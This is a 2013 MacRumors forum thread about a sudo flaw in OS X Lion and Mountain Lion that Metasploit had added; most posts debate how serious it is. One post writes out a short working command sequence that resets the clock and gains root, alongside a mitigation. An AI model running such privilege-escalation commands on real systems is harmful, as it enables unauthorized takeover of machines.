Go Back   MacRumors Forums > News and Article Discussion > MacRumors.com News Discussion

Reply
 
Thread Tools Search this Thread Display Modes
Old Aug 28, 2013, 09:03 PM   #1
MacRumors
macrumors bot
 
Join Date: Apr 2001
OS X Vulnerability Can Allow Superuser Access to Unauthorized Users




Users looking to exploit a vulnerability in the Sudo Unix command, originally reported back in March, have received some assistance, reports Ars Technica.

The developers of Metasploit, software that makes it easier to misuse vulnerabilities in operating systems and applications, have added the Sudo vulnerability to their software suite. All versions of OS X from OS X Lion 10.7 through the current Mountain Lion 10.8.4 remain vulnerable.
Quote:
Mac users should realize that an attacker must satisfy a variety of conditions before being able to exploit this vulnerability. For one, the end-user who is logged in must already have administrator privileges. And for another, the user must have successfully run sudo at least once in the past. And of course, the attacker must already have either physical or remote shell access to the target machine. In other words: this exploit can't be used in the kind of drive-by webpage attacks that last year infected some 650,000 Macs with the Flashback malware. This doesn't mean it's a non-issue though, since the exploit can be used in concert with other attacks to magnify the damage they can do.
Most of the recent exploits in Mac OS X have been related to Java, which Apple completely blocked earlier this year over security vulnerabilities, though Apple did release a standalone malware removal tool to help clean machines that were affected by a number of Java vulnerabilities.

OS X has been targeted more in recent years as it has gained in popularity. The Janicab.A malware was discovered last month, while another program called macs.app was discovered in May. That app captured and stored screenshots.

Article Link: OS X Vulnerability Can Allow Superuser Access to Unauthorized Users
MacRumors is offline   0 Reply With Quote
Old Aug 28, 2013, 09:12 PM   #2
BuCkDoG
macrumors regular
 
Join Date: Jun 2013
Interesting. Lets hope they patch this soon.
__________________
15" Retina MacBook Pro 2.7 Intel i7 16GB RAM 512 SSD
iPad 3 16GB WiFi + 3G White
iPhone 6 16GB Space Gray
BuCkDoG is offline   5 Reply With Quote
Old Aug 28, 2013, 09:26 PM   #3
tsadi
macrumors member
 
Join Date: Feb 2011
"For one, the end-user who is logged in must already have administrator privileges. And for another, the user must have successfully run sudo at least once in the past."

I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
tsadi is offline   4 Reply With Quote
Old Aug 28, 2013, 09:31 PM   #4
Dalton63841
macrumors 65816
 
Dalton63841's Avatar
 
Join Date: Nov 2010
Location: SEMO, USA
Quote:
Originally Posted by tsadi View Post
"For one, the end-user who is logged in must already have administrator privileges. And for another, the user must have successfully run sudo at least once in the past."

I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
What it is saying is that if an attacker already has access to your machine, AND you are on an administrator account, AND you have opened Terminal and used sudo, THEN they could maybe gain root access to your account.
__________________
mid-2009 13" Macbook Pro, 2.26Ghz, 8GB RAM, 120GB SSD + 1TB HDD
Dalton63841 is offline   6 Reply With Quote
Old Aug 28, 2013, 09:31 PM   #5
bondsbw
macrumors member
 
Join Date: Sep 2006
Quote:
Originally Posted by tsadi View Post
I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
I was confused about this too. The summary doesn't go into much detail, and the title can be misread/is confusing. Does it mean that unauthorized users can somehow gain root? Is it an exploit that is possible when one logged-in user has root access and another logged-in remote or physical user has some level of shell access (e.g. via guest account or via low-privileged user account)?
bondsbw is offline   2 Reply With Quote
Old Aug 28, 2013, 09:33 PM   #6
pdjudd
macrumors 68040
 
Join Date: Jun 2007
Location: Plymouth, MN
Quote:
Originally Posted by tsadi View Post
I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
Admin and root are two different levels of access. You can do some things with root that you cannot do with admin. Root is the deepest access one can have - but it's not really the goal of most hackers. An administrator account is probably the most that an attacker really needs since they can pretty much do anything they need with that account.

So an exploit that needs admin rights access and one that rehires you to have used sudo isn't one that is high priority. The number of users that run sudo at all is really small, and from a security standpoint, if you have admin rights, all security goes out the window. In other words, you don't have security.
pdjudd is offline   8 Reply With Quote
Old Aug 28, 2013, 09:34 PM   #7
sjinsjca
macrumors 68000
 
Join Date: Oct 2008
Quote:
Originally Posted by tsadi View Post
"I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
Admin != root
sjinsjca is offline   8 Reply With Quote
Old Aug 28, 2013, 09:39 PM   #8
jameslmoser
macrumors 6502
 
Join Date: Sep 2011
I know a lot of mac users, and only one other person I know of has ever used sudo. We are both sysadmins/programmers. It also seems like if the attacker already has shell access to your machine, then either they already have an account on the machine (probably someone the machine owner knows) or they already used another exploit to get to this point. I don't see this as a major concern, but obviously it should be fixed.

----------

Quote:
Originally Posted by Dalton63841 View Post
What it is saying is that if an attacker already has access to your machine, AND you are on an administrator account, AND you have opened Terminal and used sudo, THEN they could maybe gain root access to your account.
Thats a lot of if/ands... =)
jameslmoser is offline   1 Reply With Quote
Old Aug 28, 2013, 09:48 PM   #9
goobot
macrumors 601
 
goobot's Avatar
 
Join Date: Jun 2009
Location: long island NY
Quote:
Originally Posted by jameslmoser View Post
I know a lot of mac users, and only one other person I know of has ever used sudo. We are both sysadmins/programmers. It also seems like if the attacker already has shell access to your machine, then either they already have an account on the machine (probably someone the machine owner knows) or they already used another exploit to get to this point. I don't see this as a major concern, but obviously it should be fixed.
Lots of people have their mac set up to login to their account automatically on boot. Also if you steal someones computer when it is in sleep mode and still logged in there you go.
__________________
Unibody Macbook |iPad|Apple TV 2|Black iPhone 6
goobot is offline   1 Reply With Quote
Old Aug 28, 2013, 09:48 PM   #10
ururk
macrumors newbie
 
Join Date: Jun 2007
Hrm. So, I had a machine once where I was an administrator, but not in the sudoers file. Fine - so I unlocked it and added myself via BBEdit. However, permissions were incorrect after updating the file, so sudo was "broken" on the machine. As an experiment, I used Disk Utility's repair permissions tool - and sure enough it fixed the sudoers file permissions, and I then had sudo access.

I know what I describe above is probably expected behavior, it made me rethink how secure I thought OS X was.
ururk is offline   0 Reply With Quote
Old Aug 28, 2013, 09:48 PM   #11
Dalton63841
macrumors 65816
 
Dalton63841's Avatar
 
Join Date: Nov 2010
Location: SEMO, USA
Quote:
Originally Posted by jameslmoser View Post

Thats a lot of if/ands... =)
Exactly. It's effectively a NON-issue, especially considering that the garden variety Mac user has never even opened Terminal. That having been said it still needs to be fixed. Who knows what fancy method they might find to exploit it if they don't fix it.
__________________
mid-2009 13" Macbook Pro, 2.26Ghz, 8GB RAM, 120GB SSD + 1TB HDD
Dalton63841 is offline   1 Reply With Quote
Old Aug 28, 2013, 09:52 PM   #12
batchtaster
macrumors 6502a
 
Join Date: Mar 2008
Since this is a "flaw" (to the extent it has been described) in sudo, it's not Mac-specific. Other flavors of UNIX are also affected. But it's more fun and gets more hits and attention when you call it an "OS X Vulnerability", as if it's Apple's mistake or fault and not due to an issue (if that's what it is) in one of several hundred non-Apple projects.
batchtaster is offline   10 Reply With Quote
Old Aug 28, 2013, 09:53 PM   #13
RabidMacFan
macrumors regular
 
Join Date: Jun 2012
Location: California
You don't need to run metasploit to exploit this bug.

The following command should give you root if you are logged in to OS X as an Administrator and have used the "sudo" command at least once in the past. It will also set your system clock to 01/01/1970.

Code:
sudo -k
systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00
sudo su
To set your system clock back to normal, go into the System Preferences and set the time and time zone back to the way it was.

To prevent somebody from abusing this attack, you will need to run the following command after every time you use the sudo command, until it gets patched.
Code:
sudo -K
RabidMacFan is offline   6 Reply With Quote
Old Aug 28, 2013, 09:55 PM   #14
Dalton63841
macrumors 65816
 
Dalton63841's Avatar
 
Join Date: Nov 2010
Location: SEMO, USA
Quote:
Originally Posted by batchtaster View Post
Since this is a "flaw" (to the extent it has been described) in sudo, it's not Mac-specific. Other flavors of UNIX are also affected. But it's more fun and gets more hits and attention when you call it an "OS X Vulnerability", as if it's Apple's mistake or fault and not due to an issue (if that's what it is) in one of several hundred non-Apple projects.
From the original article:

Quote:
The addition capitalizes on the fact that all versions of OS X from 10.7 through the current 10.8.4 remain vulnerable. While the bug also affected many Linux distributions, most of those require a root password to change the computer clock. Macs impose no such restrictions on clock changes thanks to the systemsetup binary.
__________________
mid-2009 13" Macbook Pro, 2.26Ghz, 8GB RAM, 120GB SSD + 1TB HDD
Dalton63841 is offline   5 Reply With Quote
Old Aug 28, 2013, 09:58 PM   #15
manu chao
macrumors 68020
 
Join Date: Jul 2003
Quote:
Originally Posted by batchtaster View Post
Since this is a "flaw" (to the extent it has been described) in sudo, it's not Mac-specific. Other flavors of UNIX are also affected. But it's more fun and gets more hits and attention when you call it an "OS X Vulnerability", as if it's Apple's mistake or fault and not due to an issue (if that's what it is) in one of several hundred non-Apple projects.
It's a OS X vulnerability if other Unix versions have long patched it in their current releases. The patch is there already, a Unix OS vendor just has to incorporate it.

Last edited by manu chao; Aug 28, 2013 at 10:05 PM.
manu chao is offline   0 Reply With Quote
Old Aug 28, 2013, 10:02 PM   #16
RabidMacFan
macrumors regular
 
Join Date: Jun 2012
Location: California
Quote:
Originally Posted by batchtaster View Post
Since this is a "flaw" (to the extent it has been described) in sudo, it's not Mac-specific. Other flavors of UNIX are also affected. But it's more fun and gets more hits and attention when you call it an "OS X Vulnerability", as if it's Apple's mistake or fault and not due to an issue (if that's what it is) in one of several hundred non-Apple projects.
It's an OS X vulnerability because sudo is built into OS X. The copy of sudo that is installed is outdated (1.7.4p6) and has known vulnerabilities. The latest version of the release branch is 1.7.10p7, released on February 27, 2013.

OS X inherits any vulnerabilities within the software that it ships with, just like Windows or Linux would inherit any vulnerabilities in software they they ship with. It may not be Mac-specific, but it definitely is an OS X vulnerability

Last edited by RabidMacFan; Aug 28, 2013 at 11:59 PM. Reason: latest version of sudo is 1.7.10p7, not 1.7.4p7
RabidMacFan is offline   1 Reply With Quote
Old Aug 28, 2013, 10:04 PM   #17
brymck
macrumors newbie
 
Join Date: Jul 2012
Location: Tokyo, Japan
Interesting.

Just so it's clear, sudo ("superuser do") creates a timestamp file so you can continue running commands with superuser privileges. With sudo -k, you can reset the timestamp file to point to the beginning of Unix time (1/1/1970). If you can reset the system clock as well, then you can therefore run commands with sudo as though you had just run it. In OSX you can reset the system clock with systemsetup, which apparently (I can't check right now) does not require administrator perms unlike most Linux distributions, hence it being an OSX vulnerability.

You need access to the computer in the first place, which probably limits the effectiveness of the exploit, but it's still a pretty ugly one with what I'd think is an obvious fix (test newer versions of sudo and update users or require higher permissions to change the system clock).
brymck is offline   1 Reply With Quote
Old Aug 28, 2013, 10:05 PM   #18
manu chao
macrumors 68020
 
Join Date: Jul 2003
Quote:
Originally Posted by Dalton63841 View Post
Exactly. It's effectively a NON-issue, especially considering that the garden variety Mac user has never even opened Terminal. That having been said it still needs to be fixed. Who knows what fancy method they might find to exploit it if they don't fix it.
It's very simple, when somebody manages to run code in your account (eg, you clicked on a downloaded file which was actually an application and you ignored the warning or an application you downloaded had a payload) they don't have access yet to settings like the firewall or deleting accounts or install and run some very low level stuff. They still need an admin password, well thanks to this exploit they don't need it anymore.

But I wonder if the malicious code could not simply install a keylogger to eventually get your password? Or do you need an admin password to install a keylogger.
manu chao is offline   1 Reply With Quote
Old Aug 28, 2013, 10:05 PM   #19
pdjudd
macrumors 68040
 
Join Date: Jun 2007
Location: Plymouth, MN
Quote:
Originally Posted by goobot View Post
Lots of people have their mac set up to login to their account automatically on boot. Also if you steal someones computer when it is in sleep mode and still logged in there you go.
If someone can get physical access to your hardware you can kiss any security in mind unless your drive is encrypted (which will require a password anyhow).

I still fail to see how this is worse.

If someone has admin access, and you loose your laptop or it's stolen - your screwed even before this path could be exploited.
pdjudd is offline   1 Reply With Quote
Old Aug 28, 2013, 10:06 PM   #20
brymck
macrumors newbie
 
Join Date: Jul 2012
Location: Tokyo, Japan
Quote:
Originally Posted by RabidMacFan View Post
OS X inherits any vulnerabilities within the software that it ships with, just like Windows or Linux would inherit any vulnerabilities in software they they ship with. It may not be Mac-specific, but it definitely is an OS X vulnerability
I think you know this already, but just so it's clear, it's actually more Mac-specific than that, because many Linux distributions require sudo in the first place to change the system clock. OS X doesn't. So while Linux distros have updated sudo, they haven't needed to with the same urgency. OS X, meanwhile, needs an update but hasn't had one. The vulnerability is really a combination of sudo and OS X's permission structure for system clock changes.

As the Ars Technica article notes:

Quote:
While the bug also affected many Linux distributions, most of those require a root password to change the computer clock. Macs impose no such restrictions on clock changes thanks to the systemsetup binary.

Last edited by brymck; Aug 28, 2013 at 10:12 PM.
brymck is offline   0 Reply With Quote
Old Aug 28, 2013, 10:07 PM   #21
charlituna
macrumors G3
 
charlituna's Avatar
 
Join Date: Jun 2008
Location: Los Angeles, CA
Quote:
Originally Posted by Dalton63841 View Post
What it is saying is that if an attacker already has access to your machine, AND you are on an administrator account, AND you have opened Terminal and used sudo, THEN they could maybe gain root access to your account.
So the 'patch' is to be mindful of who has access to your computer
__________________
Return of the Non Tech's Wish List
(She's family so I'm biased )
charlituna is offline   1 Reply With Quote
Old Aug 28, 2013, 10:10 PM   #22
mikethebigo
macrumors 68000
 
Join Date: May 2009
Sudo make me a sandwich.
mikethebigo is offline   6 Reply With Quote
Old Aug 28, 2013, 10:13 PM   #23
Four oF NINE
macrumors 65816
 
Four oF NINE's Avatar
 
Join Date: Sep 2011
Location: Soviet Union
I'm not sure I even understand this particular vulnerability. Is this something that can be executed remotely or does someone require physical access to the machine?

Are there any user steps that can preempt this particular vulnerability?
__________________
13 inch 2012 MBP SSD Gold & White iPhone 5S 64gb, Yellow iPhone 5C 2 Apple TVs White iPad Air & iPad Mini Airport Time Capsule & Airport Extreme iPod classic and iPod shuffle
Four oF NINE is offline   0 Reply With Quote
Old Aug 28, 2013, 10:14 PM   #24
ScottishCaptain
macrumors 6502a
 
Join Date: Oct 2008
Quote:
Originally Posted by mikethebigo View Post
Sudo make me a sandwich.
make: *** No rule to make target `me'. Stop.

-SC
__________________
2010 Mac Pro (MacPro5,1), 2*2.93ghz, 64GB, 4x2TB, Apple RAID Card, 5970 GPU, 2xSD, Eizo CG276W
ScottishCaptain is offline   2 Reply With Quote
Old Aug 28, 2013, 10:22 PM   #25
V.K.
macrumors 6502
 
Join Date: Dec 2007
Location: Toronto, Canada
EDIT: mea culpa, I was wrong. this is a real vulnerability that needs to be fixed.

Last edited by V.K.; Aug 29, 2013 at 12:05 AM.
V.K. is offline   0 Reply With Quote

Reply
MacRumors Forums > News and Article Discussion > MacRumors.com News Discussion

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Similar Threads
thread Thread Starter Forum Replies Last Post
Apple Sends Email to iTunes Users Offering Refunds for Unauthorized In-App Purchases MacRumors MacRumors.com News Discussion 68 Mar 27, 2014 01:44 PM
iOS 7 Lock Screen Vulnerability Gives Access to Photos, Email MacRumors MacRumors.com News Discussion 168 Sep 24, 2013 07:49 AM
iOS 7 Beta Warns Users When Using Unauthorized Lightning Cables and Accessories MacRumors iOS Blog Discussion 157 Sep 22, 2013 03:23 PM
Unauthorized access through Screen Sharing Cccocco Mac OS X 10.7 Lion 3 Dec 3, 2012 10:19 AM
Detecting Unauthorized Users applepackard Mac Applications and Mac App Store 3 Jul 19, 2012 04:36 PM

Forum Jump

All times are GMT -5. The time now is 10:37 AM.

Mac Rumors | Mac | iPhone | iPhone Game Reviews | iPhone Apps

Mobile Version | Fixed | Fluid | Fluid HD
Copyright 2002-2013, MacRumors.com, LLC